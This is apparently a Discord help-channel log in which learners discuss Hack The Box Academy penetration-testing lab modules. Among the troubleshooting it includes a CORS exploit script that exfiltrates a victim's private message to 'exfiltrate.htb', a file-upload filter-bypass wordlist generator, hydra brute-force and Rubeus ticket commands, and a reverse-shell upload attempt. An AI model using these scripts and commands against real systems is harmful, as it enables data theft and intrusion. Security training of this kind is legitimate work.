#modules

For anyone interested, the highlighted part is what misled me. I removed the trailing period from my answer and it was accepted.

ah yeah always use view page source

Hi everyone,

Module: User Account Control

I just want to check if my understanding is correct.
Simplified: For UAC, the user is granted 2 tokens, 1 as low priv user and 1 for Admin. It is still possible to run powershell and cmd as Admin, without any modification, transferring dll?

Is the objective of the exercise is it so that the attacker would become less noisy? Or what exactly is controlled/limited?

if the user has admin rights, they can open cmd as admin and click yes on the prompt, and it will be started with the admin token

Hello, I am working on Password Attacks, "Credential Hunting in Linux". I am supposed to find the password of user Will and the hint says I should try to connect as user "Kira" using variations of the password "LoveYou1". I've created a mutated password list using the custom.rule that I created in the "Password Mutation" Section. I ran it using the command 'hydra -l Kira -P LoveYou1mut.list -s 22 -t 16 ssh://ip_address' however nothing came up. I do not really know what to try next.

2 things: don't attack ssh and use the custom.rule from the resources

Also kira lowercase since it's a linux host

Ok, I shouldn't attack ssh in general or is it just in this particular case?

In general

Ssh is an extremely slow service

Got it

Why can't I transfer this kind of slightly larger file?

hello guys I am trying to do a reverse port forwarding with ssh. however, when I enter the command ssh -R 172.16.1.5:9000:10.10.15.110:4444 htb-student@10.129.205.170 the pivot host is only listening on 127.0.0.1. Any help ?

In the ADCS module, ESC1 section, certipy auth fails on my side like this

[*] Using principal: administrator@lab.local
[*] Trying to get TGT...
[-] Got error: [Errno 104] Connection reset by peer

I have set DNS records in /etc/hosts to cover lab.local and lab-dc.lab.local. I have tried the exact same command as in the module and some variations as well. Everytime my AS-REP request against the Kerberos endpoint does not get an answer and times out (recorded with Wireshark). Interestingly, I have also had this exact experience in an engagement a couple of weeks ago, though there was some special config on my client side. Anybody knows what may be going on?

I am using version 4.8.2.

it's a network/firewall issue, for labs resetting usually fixes it, if it's irl then yeah check with client

Specify the filename or end the sharename with a \

\\ip\sharename\file.extension

Or just \\ip\sharename\

hey everyone, how do i open the contents of a completed module? been taking a break and need to revisit some specifics from a module i finished

When you click on the completed module you can click "retake" to open it again, or if it's in a list like a job role or skill path clicking "view" will open it to the first section

both can't

Hey ppl, what is alternative to Pwnbox for free users. can i just use any ather vm to complete task?

network error

Yes, you just need to download the ovpn file

I've been stuck for a long time.

Also since it looks like you're in an rdp session xfreerdp has the /drive: option to mount a share

It would show up under \\tsclient\sharename

HI! Can you push me in the right direction?
Advanced SQL Injections
Introduction to PostgreSQL
Questions - 4

HI! Can you push me in the right direction?

To answer the question, do I need to combine 3 tables?
What is the best way?
With subqueries or UNION and JOIN operators:?

It says I don't have permission. What should I do?

And I can't use the command using cmd opened with administrator privileges.

Maybe launch xfreerdp from a write able folder

I got stuck in getting started module

can you help me ?

Looks like you launched it from /home/

yes

Only if you actually ask your question

Why not share /tmp/?

I'll try.

/home/ isn't generally a writeable directory

/drive:share,/tmp/

This kind of detail is too deadly for newbies

List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.

smbclient -U bob ////ip//users

it doesn`t work

It's working,thanks!!!

what's the exact command you used? and include the error, "doesn't work" is not descriptive at all

hi @next bronze , thanks for the reply. specifically for UAC that is always the case right? admin with limited privileges that can be enabled if they choose to?

He asks me the password, how do I get it + hint for this question is Bob likes use weak passwords

i tried

admin
bob
Welcome1
anonymous
space

yes, if they already have admin rights, then UAC is not a concern. when it's needed depends on the UAC settings. but this is only a GUI thing, so if you only have cli access, you'll need to find another way to get past it

one of those should work

oh right. got it. thanks!

None of them work + Is the way I write the smbcclient correct?

nope one of those work

how about you give the exact command you used and the error

Hy

Anyone had/having issues with the Attacking FTP target host keeping the FTP port closed? For the Attacking Common Services section

I wait enough time i would think for everything on the target to spin up, port stays closed regardless

smbclient -U bob ////ip//users

Error after entering an incorrect password:

do_connect: Connection to failed (Error NT_STATUS_NOT_FOUND)

//ip/share or \\\\ip\\share

it work , thanks

okay im new here and having a little difficulty, not sure where to ask lol

so I have set up a box, I go to ping the ip and it comes up destination host unreachable? Does that mean theres a problem with the box?

Your VPN connection is fine? double check the terminal

or are you using browser?

how would I check that? im in my own VM

again appologies im brand new lol

the openvpn connection output in the terminal you connected from

ah just checked that think its sorted it

wtf??

wtf??

Not enough space

Sounds like you didn't allocate a lot of storage to your vm

It's pwnbox

Then something sounds like it's not set up right, try dragging and dropping the file with GUI

Hey I am doing the wordPress module. last assigntment where we have to upload a web shell via a theme. The problem is that I can not seem to able to enter the admin panel. I am trying to brute force the password using rockyou.txt with wpscan but it is really slow

The transmission disconnected and I wondered if I should just fill in the answers and skip here, it's wasting too much of my time

Connect to the target and enumerate the available network shares. What is the password of the Administrator2 user?

for the WINDOWS ATTACKS & DEFENSE module, I cant find this tool Invoke-ShareFinder anywhere, am i supposed to download it?

🚨 🚨 🚨 HELLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLP PLEASE: i tried to reset my pssd but i didn't got any email from HTB, what to do?

u probably entered wrong email?

@inland shoal i checked it many time

idk but dont message here, go ask general chat or support

@inland shoal ok tnx

I have done much of THM and I take a break from ctf now I want to dive in more so make HTB account

bump

hello, in the module shells and payload The Live Engagement, how do i get the creds for the tomcat manager

fuck got them from the hint

si i was forced to check an hint?

Nope.

The creds can be obtained by || looking around in one of those 4 machines ||

couldnt find server.xml

didnt look good enough then

The creds arent in server.xml.

that explains

ok i found out, we dont need the script, just move to the network share

Read my hint again slowly

dont overthink it, its much simpler that looking into config files

they basically hand you the creds when you rdp

Am I missing something here? Why would one just assume 'nibbles' was the password because it showed up in a few places in config file. There are numerous other words that could easily be the password in that file. This seems like a massive stretch to try this thought process for a real world engagement.

yeah

im dumbhaha found them

thanks guys

Any preliminary reviews of the binary fuzzing module?

Name of the machine.
There are some machine who uses the name as password.
I agree its a bit of wierd and annoying since its not something that happens a lot. And not the same as like admin:admin

But it happens.

Took me an hour to find em then took a step back and saw what i got handed to, and voula, got the creds

interesting. thank you

So basically I am new here, I am trying to follow the pen test path in HTB academy, is it normal that almost all the time I need to use "show solution" to finish the question?

I agree its annoying. And something many ppl wouldnt try either

Not sure if they still do it like that on the labs(since nibbles is old machine)

to be fair it is similar to the username and using username as pass is pretty common

and there are tools to scrape the webpages to get a wordlist, did that in one of my recent engagements

Well most ppl try user:user or with admin or tomcat etc. Sure if i get a michael ill try its name aswell but i think as a beginner you wont think about it.

yeah it makes sense but not intuitive

Well if you struggle on the first 2 modules id suggest some fundamental modules first. As the stuff will only get harder

No. You should try to understand the content so that you know why something works the way it does.
Have you already taken the Information Security Foundations Path https://academy.hackthebox.com/path/preview/information-security-foundations ?

Comrades, good day, I hope you are well. A guide to understanding the management of nessus? In the vulnerability assessment module, I think it's not so deep because I see that I have some gaps to handle the tool well, that I'm not saying that it's wrong, but I see that I need to go deeper into this topic

is there any reason why Kali linux takes forever to get smbclient?

Just another quick question let say for example this question: " Based on the last result, find out which operating system it belongs to. Submit the name of the operating system as result." In that module, I basically read through and understand every single one of those nmap command is doing, but through the solution, it mention that the number of ttl provide us the information of the operating system, there are not a piece of information in that chapter have mention about the details of this term, is it because I need to take that info security foundation skill path first to know what the "ttl" indicate? or it is something I should google myself?

https://ostechnix.com/identify-operating-system-ttl-ping/

Well id say 99% of ppl should have heard about ttl of you visited a highschool/college about computer stuff. But yea best bet is to learn about it via google.
Ttl stands for "time to live", refers to the amount of time or “hops” that a packet is set to exist inside a network before being discarded by a router.
The default initial TTL value for Linux/Unix is 64, and TTL value for Windows is 128.

So for example if you see a value close to 128, like example 127 etc you would know we work with a windows machine

Well not sure what is the point to mention 99 % of the people have heard about ttl. luckly I know what ttl is but just don't know it can use to identify operating system.

https://MachineIp:8834
?

Well you asked what ttl indicated and well my response was more like :.most ppl dont need to google what ttl is, but a lot of em just need to google how to idenitfy os for example if they dont understand

Thats the provided module ip?

back2school

If I can't update smbclient with sudo apt install does that mean I cant complete the module?

Hey before taking ecppt what are the pre requisits ?? like can i directly go for it ?? how difficult is it?

ecppt? wrong server?

Best to ask in #starting-point

https://tenor.com/view/one-punch-man-anime-girl-gif-20958028

@haughty stirrup

Can someone help me?

https://app.hackthebox.com/challenges/Reminiscent

#challenges

I try to dowload the file but it still tell me that network error for hours$

I don't have access to this server

Then read and follow #welcome

it is good now thank you

Lmao

oh boy i am really really not a fan of subnetting

this upgrading the tty is just not working. I've been at it for about an hour now. Once I bring nc back to the fg hitting enter does nada. I just get those weird letters. CTRL-C doesn't work either and I have to just kill the window. if yall have seen this before let me know. ChatGPT just gave me the same instructions as HTB

stty raw -echo;fg

I'll give that a go. Thank you.

wtf, why does that work with putting fg on the same line

I would have spent another month trying to sort that out

Hi, could anyone please help me understand what am I meant to do here?
Identify if its possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...))

I have an FQDN (a subdomain) I found in a previous solution. I try to use dig on it but none of the TXT files appear to be using the requested format. I'm not sure I'm completely understanding what's required of me here.

Did you try to do the zone transfer for the authoritative server ? I don't think you can do a zone transfer on a subdomain but maybe someone smarter can confirm.

To perform a zone transfer on a subdomain, follow the same steps as for a regular domain:

Identify the authoritative DNS server for the subdomain.
Use a DNS querying tool like dig or nslookup to attempt a zone transfer against the authoritative DNS server.
Analyze the results to see if the zone transfer was successful and to extract any relevant DNS records, including TXT records.

-ChatGPT

What's considered an authoritative server?
This is one of the commands I've tried but it just says connection failed host unreachable
dig axfr inlanefreight.htb @10.x.x.x

hi guys, i'm just trying to complete the end of module test for "Information Gathering Web Edition"

I'm uncertain what this question is looking for: Perform active infrastructure identification against the host https://i.imgur.com. What server name is returned for the host?

server name as in it's hostname?

file upload attacks : Blacklist Filters MODULE
i upload the file succfullly but i cannt excute it

make sure you found all subdomains

Can someone help me, i need to edit the /etc/proxychains.conf for a module but i dont have permission

maybe just "sudo vi /etc/proxychains.conf"?

Find all subdomains and then use dig axfr inlanefreight.htb @<subdomain> or something else?

use the zone transfer also on any subdomains you find

the syntax is

Omg i'm dumb ty XD

the dig syntax is: dig <query type> <target domain/subdomain> @nameserverIP

query type can be axfr

Lol

yeah sorry

didn't mean to `@~1 u

No worries

No, there's a section in one of the tools that literally is the "server name:"

@roguesec im on the same module

i finished the black listed one

but the white listed is crazy hard

u did it ?

if anyone can help me i tired every thing for hours i keep giving me this

file upload attacks : white Filters MODULE

There are 3 ways to bypass it in that section. Your screenshot shows one way. Did you try the other 2 ways?

Hi, anyone know how to download the cheat sheets of academy in .md or the old extensión that modules have

shouldnt the word list i created with this script contain all methods

for char in '%20' '%0a' '%00' '%0d0a' '/' '.\' '.' '…' ':'; do
for ext in '.php' '.phps' '.phar' '.phtml'; do
echo "shell$char$ext.jpg" >> wordlist.txt
echo "shell$ext$char.jpg" >> wordlist.txt
echo "shell.jpg$char$ext" >> wordlist.txt
echo "shell.jpg$ext$char" >> wordlist.txt
done
done

not sure you'd have to look

give me some tips

i did: use another method taught in the section that's not character injection

doesn't burp suite help with this

ok educate me about what u did cause i am really stuck

DM me

ok

Hey everyone! Long time reader, first time....writer? i am currently stuck on the "Shells & Payloads"/Infiltrating Windows section/ Question 3: Basically gain shell and find flag.txt, when I print the flag it seams to be corrupted or encrypted in some way and I was wondering if someone could provide some incite to what i can try?

DM me, it should print fine

I got all the way to the final assessment for this entire File Uploads Module. However i felt uneasy about my knowledge, so I rebooted the entire module from section 1.1

I got stuck on type filters for like 3 days

i just finished the type filters was hard ngl

Anyone else having issues with Targets Spawning? Been waiting 5-10 minutes and seems like it's not going to happen

me too

hey guys, anyone else having issues with the website? very slow loading times, connection dies randomly

Haven't really had an issue with the HTB Academy site, but my targets aren't spawning so hanging it up for awhile

Need to little nudge on
SERVER-SIDE ATTACKS: Blind SSRF Exploitation Example

I got the flag through other method but can anyone help with why the given html code with reverse shell exploit when uploaded to the file to pdf converter converter site doesn't give a revise shell??

https://academy.hackthebox.com/module/145/section/1300

I tried the exact same method explained in the section

1. Double URL encoded the python rev shell code
2. put the above in the html file and save it
3. sudo nc -nvlp 9090
4. Uploaded the malicious html file

But no reverse shell

If I want to use my own box for doing the modules is there a trick to getting similar / the same helper files as on the htb machines? e.g. common usernames etc

I am on the ZAP Scanner section of the Using Web Proxies module. The question indicates to use ZAP Scan and leverage the high vulnerability that is identified. I've scanned a number of areas and ZAP doesn't seem to identify any high vulns. At this point I'm not sure if I missed something or maybe ZAP just isn't playing well and I'm wasting my time. TIA.

What the hell is this account, I've been trying for a long time with no luck

FOOTPRINTING > SNMP
can hint me for this
Enumerate the custom script that is running on the system and submit its output as the answer.

snmpwalk -v2c -c public 10.129.26.8
( But i dont see the flag??)

Have you read the hint?

jmarston?

Are you asking or did you try it?

I used a script that included this name, but I don't seem to have had any success, I'm going to try it again now using this name

That should find it for you unless my notes are bad

I assume you're asking about seclists? If you have Kali or Parrot they both should come with it. Else you can just grab it here

https://github.com/danielmiessler/SecLists

Mine didn't return any high alerts either, but I was able to find it from a medium.

You can DM me if you want

Hi, I am doing the Password Attacks Lab - Medium. I have run out of options and I would really appreciate few hints on what to do next.

What I have done so far:
||1. Decrypted the Documentation.docx from the Samba share and got password for j* user.||
||2. SSH into the server, enumerate the MySQL server and got creds for d* user.||

I have checked various steps mentioned in Credential Hunting in Linux, but I cannot find anything for privilege escalation.

Perhaps an id us useful

Also: heavy spoilers with usernames and such

One of the first things I do when I get another user's creds is check what the user has been doing.

Added spoiler

I was going to suggest to substitute user, basic but easy win with new creds.

Spoiler tags do nothing, you can easily redact usernames with first initial *

I.e. j* and d*

Those that have done it will generally be able to understand where you're at and assist from there

I have edited the usernames

I checked the user's history but got nothing there.

whaaat really? i wonder if they changed it. i got a direct answer there.

This was the case for Easy Labs though

The user just belongs to its own usergroup

if that's the case i'd say hunt for hidden files/folders

That was a hint btw, relating to ssh

You might be thinking of something different

i'm definitely not

This one doesn't have creds in history

Which user are you currently interacting as? J or D?

Yeah I was referring to plaintext creds

Something is interesting about the history though

D

Then listen to those two. Check history and for hidden files

I found one log that suggests CVE of 2018, but I don't think that is the right direction. Other than that, I can't find anything.

DM me

Looks good thank you

CVEs not required

Sometime,I about to give up in some section until I realized that I forgot to connect the vpn

Just figured out what went wrong
A tiny mistake
BTW thanks for the poke
🤜🤛

After getting creds of d*
Looks for some files, history, etc in d*'s ssh session

There you will find some
Then crack that something

And then you will know what to do

Put the output of your command in a text file
Then try to grep the flag from it (format i.e HTB{)
Hope it will make things a little Faster

Got it thanks. Couldn’t find initially

After performing the previous attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and make the appropriate change to the registry to prevent the PrinterBug attack. Then, restart DC1 and try the same attack again. What is the error message seen when running dementor.py?
Can someone please give me the answer for this ffs (WINDOWS ATTACKS & DEFENSE Module)

I got the answer by following the steps but its not accepting it
||[-] exception RPRN SessionError: code: 0x6ab - RPC_S_INVALID_NET_ADDR - The network address is invalid.||

Maybe the error code is the RPC_... part

this is the hint given though Copy and paste the entire error message, starting with [-]

wait i think i missed out the 'restart DC step' thats why

Lol

Hey guys! Can I get some help with the CORS Misconfiguration module? I have an exploit on the Exploit Server but the withCredentials doesnt seem to be working, the xhr request just takes me to the 'Sign In' 'Sign Up' page (unauthenticated)

Here is my exploit:

    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'https://vulnerablesite.htb:54234/profile.php', true);
    xhr.withCredentials = true;
    xhr.onload = () => {
      var doc = new DOMParser().parseFromString(xhr.response, 'text/html');
      var msg = encodeURIComponent(doc.getElementById('private-message'));
          location = 'https://exfiltrate.htb:54234/log?data=' + btoa(msg);
    };
    xhr.send();
</script>

Anyone here managed to complete the Whitebox Attacks module Skills Assessment? Having a complete mare with it at the moment...

Hello, am trying to do blind sql injection module RCE part and I do not know why but the server is not making the http request to download the nc.exe hosted on my server.
I tried with ping and indeed the command is executed but my PC does not reply, I enabled the firewall rules

do i still get access to the course materials if i finish it and my subscription expires ?

sounds dumb but what is the answer to the question from Attacking Common Applications -> ColdFusion - Discovery & Enumeration. I tried every protocol i found but nothing was right

yes

Hi guys! Did anyone do this module?
Module: Active Directory Trust Attacks
Section: Unconstrained Delegation
Link: https://academy.hackthebox.com/module/253/section/2803
Question: Abuse Unconstrained Delegation to get the TGT of DC01$ and submit the flag located at \DC01\UCD_flag\flag.txt

i replicated the attack as mentioned in the module but either the Spoolsample is not working or i dont know because there are now TGT appearing.
Also the environment is really slow and connection is keep erroring out. Please HTB at least the paid things should work properly.

just following the steps in the module worked for me, you need to use rdp tho

i did exactly the same

then Idk, the tgt for DC01$ appeared and it worked

I puffed for a day and managed to overcome it on my own!!!😁 🦾

good for you. I am sick and tired that conenction breaks every two minutes of HTB and services doesnt work. When HTB will fix the have a "working" environment? And dont tell me my connection is weak:D

Anyway i did it from linux...

nvm I got it

We’ve fixed the VM slowness issue for this module on EU-ACADEMY-2 Server. Please try to respawn the target using EU-ACADEMY-2 VPN server. Rest of the servers will be patched in few hours.

I tested the section and it is working as expected.

Where was the channel for reporting typos in modules?

It's this nowhttps://discord.com/channels/473760315293696010/1234357888114364508

#1234357888114364508

nvm

I prefer a text channel over threads

This way you can see what has been completed and what is still open.
Especially for erratum I think this view is better

Can just react with a ✅ 🤷🏼‍♂️

i'm for this new change

for the WINDOWS ATTACKS & DEFENSE (PKI - ESC1) module, what should i do with my cert.pfx file? running this command in bob machine does nothing

.\Rubeus.exe asktgt /domain:eagle.local /user:Administrator /certificate:cert.pfx /dc:dc1.eagle.local /ptt

am i supposed to be transferring the pfx file to bob machine?

hi

resolved, had to manually copy the cert.pfx to bob

I found that Medium article as well which is why I started to believe it's not worth chasing any longer. At least I know I'm not the only one now so thank you for clarifying!

Not a medium article but a medium alert

Hey, I need help with this following problem. The question is
How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
I've tried this and get 3
||netstat -ln4 | grep "LISTEN" | grep -vE "127" | wc -l||
can anyone help?

(NVM got it!)

Hi, I just tested your exploit and it works if you deliver it to the victim (although there is a minor issue that will prevent you from getting the flag). However, the reason why it does not work for you locally might be because of your browser's settings regarding third-party tracking. For instance, I just tried your exploit in the default configuration of Burp's builtin Chromium browser, and it does not work, but generates the attached warning in the Console. To prevent this from occurring, adjust the browser settings accordingly. I'm going to add a note to the section to make it more clear. 🙂

Oooh that makes a lot more sense! So just for my knowledge, do you have a default setup browser to not encounter these issues? Cuz I tried the same in Firefox and encountered the same issue

I'm doing the skill assessment on Attacking Common Application. i need some help

I've scanned the vhost and did a FUZZ on it

but can't seem to find the correct url

??

Hello, very good, the reason for this post is because I am having problems logging into my hack the box account.
I am providing the correct credentials but for some strange reason it does not allow me to log in, it tells me that the credentials are invalid
and when trying to reset the password with the email I do not receive any email from htb to reset the password, this is what it tells me:If this e-mail exists, then you will receive a reset link at: xxxxxxx@gmail.com But I am not receiving said email

Reach out to support

ok gracias

Module: Attacking web applications with ffuf
High ms on pwnbox locations.

Anyone else facing this issue?

can anybody help me with Privilege Escalation - Nibbles?

No

Can someone help me doing the second thing, i have the cookie but i dont now how to continue

If you would like help, it is best if you say which module and which section you are in.
Then it is always helpful if you tell us what you have already tried.
Most users here can't help with a simple print screen of a question.

What exactly is the problem?

dm me

USING WEB PROXIES module
and zapo fuzzer

I have search for the txt and hashed it with md5, but idk what is the result

Which list did you use?

root
admin
test
guest
info
adm
mysql
user
administrator
oracle
ftp
pi
puppet
ansible
ec2-user
vagrant
azureuser

Teh thing is do i have to fuzz the cookie with the username in md5

The module shows you how to do this

Read the chapter Processors again

I mean i undestandd that, but i dont know what where should i fuzz in the response, to get the username

Read the question again

The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists.

I need help on conditional branching in Intro to Assembly Language. The question is "The attached assembly code loops forever. Try to modify (mov rax, 5) to make it not loop. What hex value prevents the loop?".

I am pretty sure that if I change rax to 2 then it wont loop. But I am not sure what hex value it wants. I have tried 0xA, 0x10 and many more but just doesnt work. Below is the assembly code:

global _start

section .text
_start:
mov rax, 5 ; change here
imul rax, 5
loop:
cmp rax, 10
jnz loop

hello guys,

Sometimes i want to connect to machine and i take this output

└─$ xfreerdp /v:10.129.111.13 /u:htb-student /p:Academy_student_AD! /dynamic-resolution
[20:14:51:613] [4368:4369] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[20:14:51:613] [4368:4369] [WARN][com.freerdp.crypto] - CN = ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
[20:15:00:652] [4368:4369] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[20:15:00:654] [4368:4368] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

Hey, just wanted to say thanks for this tip. Exploit works perfectly now. I agree a small hint on the page will help hours of debugging (Should have checked console issues but you live you learn)

You'll want to wrap the pw in single quotes /p:'password' and /cert:ignore should help with that error message. Edit: wrong flag too much ligolo on the brain. Edit2: you can also increase the timeout /timeout:60000

hey is it worth doing the basic toolset path if i'm also planning on doing the CPTS path? i just want to get a headstart on solving ctfs and stuff like that

Cpts path won't really help with ctfs tbqh

There's some stuff that's useful like footprinting and basic service stuff

But the overall focus is a domain env

oh yeah that makes sense

Ctf environments are different, and often not interconnected

how do i learn how to solve ctfs

Look up past ctfs and published challenges, read solves for them, take notes

There's also the challenges section of htb labs

I am stuck on the same problem

wouldn't there be similar techniques and tools though?

since i mean the overall goal is still enumeration, exploitation, privesc, and post exploitation (usually)

is the process really that different?

I mean mostly, but there's also a lot more gimmick stuff

CTFs don't often focus on just PWN

There's a variety of categories

oh true

is the best way to learn ctfs really just to read writeups for ctfs?

Pretty much, yeah

As in cases with HTB hosted ctfs sometimes there's "repeat" or "reprisal" challenges, which are basically v2/v3 of a popular challenge or a challenge that didn't get a lot of solves

ic

CPTS is meant more to simulate actual corporate environments right?

Yup

that makes sense

A low security posture environment, but a realistic environment nonetheless

Can use a nudge on question 3 for NTLM Relay attack skills assessment. peas and tanks

why cant i xfreerdp i RDP to with user "htb-student" and password "Academy_student_AD!" i do this and i try toxfreerdp but it always say [12:56:47:827] [2561:2562] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[12:56:47:827] [2561:2562] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[12:56:47:827] [2561:2562] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[12:56:47:827] [2561:2562] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
i reset like 20 times

I am facing trouble with threat hunting module skill assesment hunt 2

Wrap the password in single quotes

ik i log in but the freerdp screen is just black and never loads i can login

Press enter

Iwhat happened to old eratum

we have the same problem.

xfreerdp /u:Username /p:Password /v:Target_IP

i can't access this

#1234357888114364508 they moved it to a forum style like #1024429874246590575

Why I can't talk to general ?

Read and follow #welcome

is done so I can't

oh I see

I know but I wanted to see some erratum sentinel wrote now i need to google it ugh !

It's probably archived

So not gone forever

I would prefer they made it read only and warned people it was changing

🪄

#858470491676737536

https://tenor.com/view/harry-potter-thomas-healy-wizard-gif-26558505

whats wrong in this
module
Nginx reverse proxy & AJP SERVER_SIDE ATTACK

Looks like you don't have it configured

u mean the nginx conf ?

yeah, you have all the server info commented out, so it's not actually running which is why you get a failure to connect

that configuration file is going to ignore anything with a # before it

i know the module saied comment it I removed the # and still the same

pay closer attention to how the module says to set it up, you're missing stuff in your server block

So guys im a bit confused. I'm doing the common service attack on the ftp section, and i'm trying to enumerate ftp like it said but the port is closed. is this some kind of glitch?? if the port is closed you cant do anything with ftp right?

just compleeted the vulnerability scanners module. Didn't enjoy that one as much as the one's previouuus

oh well

I did have a general question, which I will also post in cpts. As I have been going through the modules it occurs to me that some snippets to automate bit's of the methodology I'm learning would come in handy. For example:

enumeration with NMAP. start with host discovery scan. thenn Probably always a top 1k port scan for tcp and udp. then feeding that into another sweep for version and script scanning of ports found. While kicking off a full tcp port scan.

then for dns enumeration for subdomains. Can probably chain together some scripts for passive and active methods.

Wondering what type of automation snippets ppl have found useful to build up

while automation can be good, i personally would want to inspect it all manually anyway in case the tool missed something

yeah I agree. but there's some stuff that can be kicked off up front and then we can go back and get more manual

i guess since we talking about building our own automation, we will know exactly what the scripts are doing so if need be we can go back and take another look

I think what i need is a bit of a conclusion oooor list of tools for each stage in my notes

I have been trying this but when I do the command ||qemu-nbd -c /dev/nbd0 Backup.vhd ||it gives me this error; after I use --format=raw it then gives me "Failed to set NBD socket"

i didn't have any issues ¯_(ツ)_/¯

If you're able to access it and get the files then you're fine

I cant lol

whenever i xfreerdp into the machine its just black?? and i reset it like 10 times but it just remains black how do i fix

Did you unlock it?

I told you before: press enter

oh danke

howd u figure that out

Many people have had the same question

Wdym? I have cracked the password and that's the farthest I've gotten. Been trying to mount this so I can unlock it but I have yet to have success

It's literally just the "this is a domain joined computer, and you agree to use this computer for work purposes"

Read the rest of the article?

It literally details how to identify and fully mount the bitlocker vhd

??? So if I read the rest of the article it'll fix the first command for me then?

It'll allow you to unlock and access the encrypted drive, yes

That command is only one part of the process

If the device was unencrypted, then that'd be it. Buy since it's encrypted, there's more to do

yea nope, I tried the commands 4 tiems in a row each time closely looking at it and I still can't seem to understand why it's not working

don't copy word for word obviously

but needless to say; it works on my machine

I would also be sure to check that it didn't get messed up in transfer

yea and you also said the first command I sent worked fine and it's not working on mine 😭

no, i said the first command is only the first step for encrpyted drives

?

if you run file Backup.vhd

as in I don't recall having any major issues after doing all the steps

they worked fine for me

if there were any errors i either ignored them or i just didn't pay attention

MODULE: Whitebox Attacks
SECTION: Authentication Bypass

I'm a little hung-up on the exercise. Reading through the code, I'm a little hung-up on the way forward:

• I tried testing against various "admin" account values, including magic hashes.
• Upon scrutiny, I saw that the profile.php page renders its output based on the user input, not the database entry. So I've tried assorted values like "qweasdadmin", knowing the hash is being compared against null values, but since hash() returns a string, I don't see a match-up working.

Can I get a nudge?

and I think this is where I'm gettign hung up, do I decrpyt the drive BEFORE I mount it to a partition? or does that come after

do the qemu-nbd part; then do the decrpytion steps

again it's a multipart process and the steps are laid out right there

Your approach with the admin is correct.
Try bypassing the password

the nbd part is only part of the process of fully mounting it

think of qemu-nbd command as prepping it

like allocating a partition for it

yea and that's my problem, the qemu-nbd command isn't working for me. I keep getting "Failed to set NBD socket"

I don't see an error; i see a warning

warnings != error

did you modprobe nbd?

yes

gimme a sec

Ok the first one wasn't working because I was usign the wrong partition, but the cryptsetup command is giving me:

I got the qemu*

because that's not the device partition

look at lsblk

the guide used /dev/nbd0p2

Is there a command to get to nbd0p2? because on my lsblk I don't have one

well your nbd partition might not be p2

look at the nbd partition; then discern from there which partition the data is on

it might be nbd0p1

So when I did qemu, I did sudo qemu-nbd -c /dev/nbd2 Backup.vhd --format=raw

and no p2 or p1 was created

it just added it to the nbd2

what does lsblk show

I tried a different version, where you use loop100 and the same thing happened

where no p1 or p2 were created

christ you have so many nbds

yeaa Idk why tbh

maybe because I Just used the command so many times 😭

if you do file Backup.vhd what does it say

i would just download a new Backup.vhd

it sounds also it shows there might be some data on those nbd sections

but you fucked it so many times that idek

The data on the nbd is me putting the backup onto it lol

and if you do ls -la Backup.vhd it's not showing as empty?

(it's not large iirc)

I would honestly restart your system as well

It was pretty big I thoughht

ok so it's not empty

yea igot the password from it

sec

maybe Ill have to just restart and redue this whole part tomorrow when Im not frusterated haha

i'm just testing it again on pwnbox

hey bro

wanna feel dumb as hell?

run qemu-nbd command with sudo

looking for a quick pointer on base64 encoding...I'm sure I'm missing something easy. I'd rather place the output of encoding into a file, copy the file over and then decode the file itself on the target machine...i.e.

base64 linikatz.sh > linitext.txt
-upload to target
base64 -d linitext.txt > linikatz.sh

hashes don't match up between attacker/target machines....so something is obviously wrong. Is it because i'm encoding the file instead of the script within the file?

Proper way in documentation for the module I'm working in to encode would be something like:

cat linikatz.sh | base64 -w 0;echo
then to decode:
echo -n '<output>' | base64 -d > linikatz.sh

how ad you uploading it? also what's wrong with just uploading as is? there's usually no need to encode

python server on attacker machine....wget on target to pull the file

you can wget without having to encode

sh is text based anyways, b64 wouldn't do much

i transferred without encoding before and running hte transferred script vs. local linikatz.sh on the server provide different results...so obviously the two could just be different but looking at them they appear to be mostly the same

but i didn't look at every single line yet

compare hashes but I doubt it's anything to do with encoding

use tcp vpn, if you use udp you might drop packets and lose data

yeah it's something with the file, thanks for the input

also i believe b64 adds an extra newline from what i remember

which could also explain the different hashes

I did lol

I got that commn ad

i just did it all (with sudo) and it worked just fine for me

Hi guys how are u

I need a team

not the place to ask about teams

read and follow #welcome to access more of the server

my problem isnt that one anymore, it was the partitions werent showing up

as I said i just did it fine (also I didn't specify the format) ¯_(ツ)_/¯

literally just 5 seconds ago

Then can u say me please which certificates are necessery for beginners?

and I literally saw that, but that doesn't asnwer why these werent showing up

Bodyfat wtf?

Are u in the cycle?

???

Mamamiya

he's talking about my bio

bro read #welcome to see how to access more of the server or just leave

this isn't a gen chat channel

if you wanna know about what certs you should aim for there's even a #careers-and-certs channel

maybe I just have to redownload it then?

looks like it's an issue with nbd?

try sudo modprobe nbd again

and maybe try a different dev

i just noticed when you modprobe nbd it generates like 15 nbd devices

yea

I read that somewhere

anyway

it's weird that it's not doing anything and i'm assuming your kali is updated

yea idk, also maybe it has to do with the file

hence the "raw" part

nope

look at my Screenshot

ahh

this is the md5sum of my Backup.vhd

I see waht you mean, hmm Idk then Ill try to redue them

nah didnt work

is yours the same or diff?

lemme look at those

my is 104M in the seocnd command

idk what that means tbh 😭

